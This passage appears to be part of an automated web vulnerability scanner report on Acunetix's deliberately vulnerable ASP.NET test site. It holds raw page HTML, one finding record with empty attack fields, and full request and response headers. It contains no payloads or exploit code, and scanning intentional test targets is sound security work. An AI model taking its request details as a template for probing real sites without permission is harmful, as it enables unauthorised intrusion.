value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi/TB7mR4IysbuEg0lOgmHIs" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1">
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" 